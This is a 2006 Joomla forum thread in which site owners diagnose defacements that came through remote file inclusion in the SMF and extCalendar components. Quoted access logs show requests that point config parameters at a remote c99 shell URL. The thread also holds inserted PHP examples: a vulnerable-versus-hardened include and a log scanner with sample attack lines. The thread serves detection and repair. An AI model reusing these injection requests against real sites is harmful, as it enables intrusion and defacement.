Joomla/MamboHacked Sites By eno7

Maggles
Joomla! Apprentice
Posts: 7
Joined: Mon Aug 22, 2005 12:36 am

Joomla/MamboHacked Sites By eno7

Post by Maggles » Mon Jul 10, 2006 12:01 pm

I had a look here:

http://www.[ ** removed hacker's list (kudos) **]/component/option, ... no7/page,1

Because this person has hacked my site twice in the last 2 days. There seem to be a lot of Joomla/Mambo sites on the list of reported attacks on sites he's hacked, and I wondered if anyone has any idea how this guy is getting in. There must be a common component, module or mambot that he's using.

Does anyone have any ideas?

Mike G.
Joomla! Apprentice
Posts: 5
Joined: Mon Jul 10, 2006 11:57 am

Re: Joomla/MamboHacked Sites By eno7

Post by Mike G. » Mon Jul 10, 2006 12:07 pm

We were also hacked by this guy ...

Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?

Regards,

Mike

Maggles
Joomla! Apprentice
Posts: 7
Joined: Mon Aug 22, 2005 12:36 am

Re: Joomla/MamboHacked Sites By eno7

Post by Maggles » Mon Jul 10, 2006 12:19 pm

Mike G. wrote:
We were also hacked by this guy ...

Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?

Regards,

Mike
We used to have a phpBB forum but changed it to vBulletin about a year ago; there is still a phpBB component installed, though. My other half is the techie and he did tell me at the weekend why we can't remove it, but I can't remember why right now. I went through all the components and modules that we don't need/use and removed them, as well as updating the rest to the latest versions etc., and my other half has tried changing settings to make it even more secure, but he still got into the site a second time. I'm just glad we take regular backups and save them elsewhere.

RobS
Joomla! Ace
Posts: 1366
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA

Re: Joomla/MamboHacked Sites By eno7

Post by RobS » Mon Jul 10, 2006 12:28 pm

@Maggles,

I have sent you a Personal Message.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

Maggles
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Mon Aug 22, 2005 12:36 am

Re: Joomla/MamboHacked Sites By eno7

Post by Maggles » Mon Jul 10, 2006 12:30 pm

RobS wrote: @Maggles,

I have sent you a Personal Message.
Thanks, I've emailed you to the address you supplied.

infograf768
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Joomla/MamboHacked Sites By eno7

Post by infograf768 » Mon Jul 10, 2006 1:49 pm

Turk Telecom also for an attack through ext_calendar.
IP 81.215.180.206
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

Mike G.
Joomla! Apprentice
Posts: 5
Joined: Mon Jul 10, 2006 11:57 am

Re: Joomla/MamboHacked Sites By eno7

Post by Mike G. » Mon Jul 10, 2006 2:04 pm

The attack on our site came from 81.213.180.37, also a Turkish site.

As I found in the log files, they used a PHP backdoor script, infecting the site through the phpBB download feature!!!

CAUTION! The script resides at this site: [mod edit: do not post links to viruses. link omitted - ChiefGoFor] and might become active if you follow the link; my virus scanner (McAfee) detected it in the browser.

Regards,

Mike
Last edited by ChiefGoFor on Mon Jul 10, 2006 2:25 pm, edited 1 time in total.

LorenzoG
Joomla! Hero
Posts: 2983
Joined: Fri Aug 19, 2005 8:46 am
Location: Stockholm, Sweden

Re: Joomla/MamboHacked Sites By eno7

Post by LorenzoG » Mon Jul 10, 2006 2:13 pm

Warning, the above link contains a trojan virus script, as advised by the poster.
Last edited by LorenzoG on Mon Jul 10, 2006 2:23 pm, edited 1 time in total.

Mike G.
Joomla! Apprentice
Posts: 5
Joined: Mon Jul 10, 2006 11:57 am

Re: Joomla/MamboHacked Sites By eno7

Post by Mike G. » Mon Jul 10, 2006 3:36 pm

Hmm ... but it might be helpful for other users to know what to search in their logfiles ....  :-\

So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.

Regards,

Mike

ChiefGoFor
Joomla! Champion
Posts: 5614
Joined: Tue Sep 13, 2005 12:22 am
Location: Omaha, Nebraska, USA

Re: Joomla/MamboHacked Sites By eno7

Post by ChiefGoFor » Mon Jul 10, 2006 4:05 pm

Mike G. wrote:
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....  :-\

So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.
I agree with you. It was kind of a catch-22 there. Your solution of searching for those key terms is great! Thank you for the information.
Joomla! ...because open source matters
"Try to answer two questions for every one question you ask." - Me

RobS
Joomla! Ace
Posts: 1366
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA

Re: Joomla/MamboHacked Sites By eno7

Post by RobS » Mon Jul 10, 2006 4:11 pm

Searching for "CONFIG_EXT", "mosConfig_absolute_path" and "mosConfig_live_site" will also reveal some of the recent exploit attempts.
Last edited by RobS on Tue Jul 11, 2006 1:07 am, edited 1 time in total.
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions

CiPHeR
Joomla! Intern
Posts: 51
Joined: Sat Oct 15, 2005 7:07 pm
Location: Ottawa

Re: Joomla/MamboHacked Sites By eno7

Post by CiPHeR » Mon Jul 17, 2006 2:16 pm

Our site also got hacked this weekend by this same Eno7 guy; his page overwrites your configuration.php file. How do we prevent this from happening again? This is a very serious issue. I am running the latest Joomla 1.0.10 and VirtueMart 1.0.6 along with SMF RC1.2. Is there some common denominator that allows this guy easy access to hack Joomla-powered sites? Everything in the root folder of our site is read-only, so how did this happen?

Thanks
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net

ChiefGoFor
Joomla! Champion
Posts: 5614
Joined: Tue Sep 13, 2005 12:22 am
Location: Omaha, Nebraska, USA

Re: Joomla/MamboHacked Sites By eno7

Post by ChiefGoFor » Mon Jul 17, 2006 2:26 pm

To my knowledge, this is not a "Joomla" issue. It is an issue with components not using some key Joomla security measures. I think in your case the culprit is SMF.

RobS knows more about it than I do, so I will let him give you a more formal answer.
Joomla! ...because open source matters
"Try to answer two questions for every one question you ask." - Me

anna.y
Joomla! Intern
Posts: 57
Joined: Fri Sep 09, 2005 5:28 am

Re: Joomla/MamboHacked Sites By eno7

Post by anna.y » Mon Jul 17, 2006 2:38 pm

What are the practical steps to restore the website.  We've just been hacked through SMF component:

85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=[EDITED by mod for security reasons]?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......

And then what are the practical steps to prevent it from recurring

Thank you

Anna
Last edited by infograf768 on Mon Jul 17, 2006 2:49 pm, edited 1 time in total.
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

infograf768
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Joomla/MamboHacked Sites By eno7

Post by infograf768 » Mon Jul 17, 2006 2:45 pm

Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

anna.y
Joomla! Intern
Posts: 57
Joined: Fri Sep 09, 2005 5:28 am

Re: Joomla/MamboHacked Sites By eno7

Post by anna.y » Mon Jul 17, 2006 2:52 pm

Thank you

Anna
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

CiPHeR
Joomla! Intern
Posts: 51
Joined: Sat Oct 15, 2005 7:07 pm
Location: Ottawa

Re: Joomla/MamboHacked Sites By eno7

Post by CiPHeR » Mon Jul 17, 2006 3:32 pm

Thanks...

One question... will that fix prevent this clown from doing this again?
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net

kolle
Joomla! Apprentice
Posts: 10
Joined: Tue Aug 30, 2005 1:19 pm
Location: Hamburg

Re: Joomla/MamboHacked Sites By eno7

Post by kolle » Mon Jul 24, 2006 9:22 am

CiPHeR wrote: One question... will that fix prevent this clown from doing this again?
I'd love to know that!
Anybody? :-*

zomertje
Joomla! Apprentice
Posts: 17
Joined: Sun Jul 09, 2006 10:41 am

Re: Joomla/MamboHacked Sites By eno7

Post by zomertje » Mon Jul 24, 2006 3:57 pm

Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx

If it comes from the same place
Or disable the component and upgrade :)

Peter Koch
Joomla! Explorer
Posts: 374
Joined: Thu Aug 18, 2005 8:54 pm

Re: Joomla/MamboHacked Sites By eno7

Post by Peter Koch » Mon Jul 24, 2006 5:42 pm

zomertje wrote: Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx
That won't help, since it is a dynamic IP of that provider, who is known to support, or at least not do anything against, hackers (his name is not allowed to be told in these forums, otherwise you get flamed). The same computer may have another IP next time.

You would need to ban all IPs of that provider. In case you need them, PM me and I will send you the whole range.

anna.y
Joomla! Intern
Posts: 57
Joined: Fri Sep 09, 2005 5:28 am

Re: Joomla/MamboHacked Sites By eno7

Post by anna.y » Tue Jul 25, 2006 2:25 am

CiPHeR wrote: Thanks...

One question... will that fix prevent this clown from doing this again?
Yes, placing that one line in the insecure files prevented the hacker from gaining access to MY website despite literally hundreds of attempts from various IPs in various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well

Anna
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

rliskey
Joomla! Guru
Posts: 828
Joined: Tue Jun 06, 2006 7:41 am
Location: California, Germany, Norway

Re: Joomla/MamboHacked Sites By eno7

Post by rliskey » Tue Jul 25, 2006 3:07 am

I had 7 sites hacked by someone with the same signature. Only three of these sites were Joomla sites. They defaced the index.php file and uploaded a file called "fix.php". If they did more I haven't found it yet.

What all the hacked sites have in common is, 1) they're all at one ISP and 2) they're all using PHP/MySQL.

Seems the exploit could be seeking out ANY poor php code, whether in a Joomla component or in any other script.

If Joomla pros would like log files or other details, contact me.

I'd also appreciate some help. Rebuilding seven sites is an intimidating task, especially since the way they're getting in doesn't appear to be clear yet.

rliskey
Joomla! Guru
Posts: 828
Joined: Tue Jun 06, 2006 7:41 am
Location: California, Germany, Norway

Re: Joomla/MamboHacked Sites By eno7

Post by rliskey » Tue Jul 25, 2006 5:28 am

Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"

infograf768
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Joomla/MamboHacked Sites By eno7

Post by infograf768 » Tue Jul 25, 2006 6:39 am

Using the vulnerability in ext-calendar.
You should back up your DB, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group

CiPHeR
Joomla! Intern
Posts: 51
Joined: Sat Oct 15, 2005 7:07 pm
Location: Ottawa

Re: Joomla/MamboHacked Sites By eno7

Post by CiPHeR » Tue Jul 25, 2006 12:00 pm

anna.y wrote:
CiPHeR wrote: Thanks...

One question... will that fix prevent this clown from doing this again?
Yes, placing that one line in the insecure files prevented the hacker from gaining access to MY website despite literally hundreds of attempts from various IPs in various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well

Anna
I don't know why all hosts DON'T have register_globals=OFF!
CiPHeR
------------------------------
wickedwebwerkz.com
gpsystems.ca
VirtueMart.net

Elpie
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm

Re: Joomla/MamboHacked Sites By eno7

Post by Elpie » Tue Jul 25, 2006 12:16 pm

CiPHeR wrote: I don't know why all hosts DON'T have register_globals=OFF!
register_globals is not, in itself, insecure - the problem is that globals are often relied upon by inexperienced developers who are unaware of the issues that can arise with globals if their code is not clean and secure. Because so many scripts rely on register_globals being on, hosts have been reluctant to turn them off (or keep them off if they are running PHP 4.2.0 or higher) - you can imagine the screams from customers if hosts suddenly disabled globals and people had their sites breaking all over the servers!
So, if people do not report to their hosts when sites get hacked, or don't ask their hosts to turn register_globals off, hosts will sit in blissful ignorance thinking their customers are happy with the settings the way they are.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
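The code shape behind the log lines quoted in this thread, and one way to harden it, as an added example (not code from the thread, from Joomla!, or from the extCalendar/SMF/phpBB components). The vulnerable function reconstructs the pattern Elpie describes: a component file that builds an include path from a variable which, with register_globals on and the file requested directly, the attacker sets from the query string. The hardened function adds the direct-access guard Joomla 1.0 and Mambo components carry on their first line (`defined('_VALID_MOS') or die(...)`); the thread never quotes the "one line" anna.y added, so taking it to be this guard is my assumption. The component path, the `attacker.example` host, the `/var/www/joomla` root and the function names are all made up for the illustration.

```php
<?php
// Added example: the remote-file-inclusion pattern behind this thread's log lines, and one hardening.
// Not code from Joomla!, extCalendar, SMF or the thread; component, host and path names are made up.

// --- Vulnerable shape (reconstructed and simplified) ---
// A component script reachable directly at /components/com_example/example.php does something like
//     require_once($mosConfig_absolute_path . '/includes/joomla.php');
// trusting that Joomla's index.php set $mosConfig_absolute_path. Requested directly with
// register_globals=On, ?mosConfig_absolute_path=http://attacker.example/c99.txt? creates that variable
// from the query string, and allow_url_fopen=On lets require_once fetch and execute the remote file.
function vulnerable_include_target(array $request): string
{
    $vars = ['mosConfig_absolute_path' => '/var/www/joomla']; // what index.php would normally provide
    // register_globals stand-in: every request parameter overwrites the variable of the same name.
    foreach ($request as $name => $value) {
        $vars[$name] = $value;
    }
    return $vars['mosConfig_absolute_path'] . '/includes/joomla.php';
}

// --- Hardened shape ---
// 1. Joomla 1.0 defines _VALID_MOS in index.php before loading any component. A component file that
//    starts with   defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
//    cannot be driven directly, so register_globals never gets a chance to seed its variables.
// 2. Never derive an include path from request data. Take the root from configuration and make sure
//    the final path carries no stream-wrapper scheme and stays below that root.
function hardened_include_target(string $configuredRoot, string $relative): ?string
{
    if (!defined('_VALID_MOS')) {
        return null; // a real component would die() here
    }
    // Reject anything that looks like a wrapper (http://, ftp://, php://, data:) or contains NUL.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $relative) || strpos($relative, "\0") !== false) {
        return null;
    }
    // Normalise "." and ".." textually so the check does not depend on the file existing yet.
    $parts = [];
    foreach (explode('/', str_replace('\\', '/', $relative)) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;
        }
        if ($segment === '..') {
            if (array_pop($parts) === null) {
                return null; // would climb above the configured root
            }
            continue;
        }
        $parts[] = $segment;
    }
    return rtrim($configuredRoot, '/') . '/' . implode('/', $parts);
}

if (PHP_SAPI === 'cli') {
    $attack = ['mosConfig_absolute_path' => 'http://attacker.example/c99.txt?'];
    // The trailing "?" turns the appended "/includes/joomla.php" into the remote URL's query string,
    // so the file actually fetched is c99.txt, exactly like the "c99.txt?ls" entries in this thread.
    echo 'vulnerable:              ', vulnerable_include_target($attack), PHP_EOL;

    echo 'hardened, direct request: ', var_export(hardened_include_target('/var/www/joomla', 'includes/joomla.php'), true), PHP_EOL;
    define('_VALID_MOS', 1); // what index.php does before including a component
    echo 'hardened, via index.php:  ', hardened_include_target('/var/www/joomla', 'includes/joomla.php'), PHP_EOL;
    echo 'hardened, URL payload:    ', var_export(hardened_include_target('/var/www/joomla', 'http://attacker.example/c99.txt?'), true), PHP_EOL;
    echo 'hardened, traversal:      ', var_export(hardened_include_target('/var/www/joomla', '../../etc/passwd'), true), PHP_EOL;
}
```

Run it with `php example.php`: the vulnerable call resolves to the attacker's URL, while the hardened call returns nothing until `_VALID_MOS` is defined and then only for a path inside the configured root. The guard is the cheap fix the thread settled on; turning register_globals off (the other fix anna.y's host applied) removes the attacker's ability to seed the variable at all, and both are worth having because the guard only protects files that carry it.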

anna.y
Joomla! Intern
Posts: 57
Joined: Fri Sep 09, 2005 5:28 am

Re: Joomla/MamboHacked Sites By eno7

Post by anna.y » Tue Jul 25, 2006 4:56 pm

infograf768 wrote: Using the vulnerability in ext-calendar.
You should back up your DB, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK.
I got hacked through an older version of com_SMF, and deleting all root files and re-installing everything was NOT an option.

All I had to do, in addition to adding the recommended line, was check which files were removed or altered by the hacker (two) and simply get those two files from my site backup.

It was rather simple and, as I said, despite hundreds of hacking attempts I'm having no further problems (keeping my fingers crossed is probably helping as well... ;))

Anna 
Anna
Toronto German Shepherd Dog Rescue
http://www.torontogsdrescue.org

omlex
Joomla! Fledgling
Posts: 3
Joined: Wed Aug 09, 2006 8:13 am

Re: Joomla/MamboHacked Sites By eno7

Post by omlex » Wed Aug 09, 2006 8:17 am

How was he able to alter the MySQL DB?

berlin
Joomla! Intern
Posts: 76
Joined: Thu Sep 01, 2005 5:41 am

Re: Joomla/MamboHacked Sites By eno7

Post by berlin » Mon Aug 14, 2006 2:46 am

rliskey wrote: Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"
I was hacked by a Turkish hacker today.

    [14-Aug-2006 07:20:22] PHP Warning:  main(http://mi.verizon.net.do/carlos18/therules25.dot): failed to open stream: HTTP request failed! HTTP/1.1 404 Object Not Found in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
    [14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening 'http://mi.verizon.net.do/carlos18/therules25.dot' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
    [14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 97

I don't know why it shows turx.nl. Is extcalendar the culprit?
The man who speaks to you of sacrifice speaks of slaves and masters. And intends to be the master. --Ayn Rand

infograf768
Joomla! Master
Posts: 19133
Joined: Fri Aug 12, 2005 3:47 pm
Location: **Translation Matters**

Re: Joomla/MamboHacked Sites By eno7

Post by infograf768 » Mon Aug 14, 2006 6:13 am

What you are posting looks like the error log and not the raw logs.

Download and open your raw logs in an editor to check for GET and "mosconfig" strings so as to figure out exactly where they got in.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
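A log-triage script that applies the indicators given in this thread, as an added example (not code from the thread or from Joomla!). It takes raw access-log lines of the kind anna.y and rliskey quoted, splits each request's query string, and reports every parameter that carries a URL, that overrides a framework or component config global (`mosConfig_*`, `CONFIG_EXT[...]`, RobS's list), or that contains the `c99.txt` / `eno7` strings Mike G. suggested grepping for; this is the "check for GET and mosconfig" step infograf768 describes, done with a parser instead of by eye. The three sample lines are constructed to match the shape of the quoted entries; the addresses, the `shell.example` host and the benign third line are made up.

```php
<?php
// Added example: triage raw Apache access-log lines for the remote-file-inclusion attempts described
// in this thread. Not code from Joomla!; the sample lines below are constructed (made-up IPs/hosts).

// Parameter names that belong to the framework or a component's config and must never come from a request.
const CONFIG_PARAM_PREFIXES = ['mosConfig_', 'CONFIG_EXT'];
// Strings posters in this thread found in their logs.
const KNOWN_INDICATORS = ['c99.txt', 'eno7'];

/** Flatten parse_str() output so CONFIG_EXT[LANGUAGES_DIR]=... becomes a single "name => value" entry. */
function flatten_params(array $params, string $prefix = ''): array
{
    $flat = [];
    foreach ($params as $key => $value) {
        $name = $prefix === '' ? (string) $key : $prefix . '[' . $key . ']';
        if (is_array($value)) {
            $flat += flatten_params($value, $name);
        } else {
            $flat[$name] = (string) $value;
        }
    }
    return $flat;
}

/** Return why a parameter looks like an RFI attempt, or null if it looks ordinary. */
function classify_param(string $name, string $value): ?string
{
    if (preg_match('#^(https?|ftp)://#i', $value)) {
        return 'URL supplied where a path is expected (remote include)';
    }
    foreach (CONFIG_PARAM_PREFIXES as $prefix) {
        if (stripos($name, $prefix) === 0) {
            return 'request overrides a configuration global';
        }
    }
    foreach (KNOWN_INDICATORS as $needle) {
        if (stripos($value, $needle) !== false) {
            return 'known indicator in value: ' . $needle;
        }
    }
    return null;
}

/** Scan combined-format log lines; return one hit per suspicious parameter. */
function scan_access_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // 203.0.113.10 - - [17/Jul/2006:08:54:53 -0400] "GET /path?query HTTP/1.1" 200 3879 "-" "agent"
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: [^"]*)?" (\d{3})/', $line, $m)) {
            continue;
        }
        [, $ip, $time, $method, $target, $status] = $m;
        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue; // no query string, nothing to inject through
        }
        // Split on the first "?" ourselves: the payload URL usually carries its own "?" (c99.txt?ls).
        parse_str(substr($target, $qpos + 1), $params);
        foreach (flatten_params($params) as $name => $value) {
            $reason = classify_param($name, $value);
            if ($reason !== null) {
                $hits[] = [
                    'ip' => $ip, 'time' => $time, 'method' => $method, 'status' => (int) $status,
                    'script' => substr($target, 0, $qpos), 'param' => $name, 'value' => $value,
                    'reason' => $reason,
                ];
            }
        }
    }
    return $hits;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample modelled on the entries quoted in this thread; the third line is benign.
    $sample = [
        '203.0.113.10 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://shell.example/c99.txt?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0"',
        '203.0.113.11 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://shell.example/images/c99.txt?ls HTTP/1.0" 200 18278 "-" "Mozilla/4.0"',
        '198.51.100.7 - - [18/Jul/2006:10:20:01 -0400] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 15210 "-" "Mozilla/5.0"',
    ];
    foreach (scan_access_log($sample) as $hit) {
        printf("%s %s %d %s -> %s=%s (%s)\n",
            $hit['time'], $hit['ip'], $hit['status'], $hit['script'], $hit['param'], $hit['value'], $hit['reason']);
    }
    // Against a real log: replace $sample with file('php://stdin', FILE_IGNORE_NEW_LINES) and run
    //   php scan.php < access_log
    // then look hardest at hits with status 200 and a non-trivial byte count: that is the component
    // answering the injected request, not rejecting it.
}
```

The first two sample lines produce one hit each (the URL in `mosConfig_absolute_path` and in `CONFIG_EXT[LANGUAGES_DIR]`); the `com_content` line produces none. Whatever the scan turns up only tells you which script was used as the entry point and when; as infograf768 and anna.y discuss above, you still have to compare the files on disk against a clean backup, because the shell that was included may have written or replaced files (`configuration.php`, `index.php`, `fix.php` in this thread) that no longer show up in the access log.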

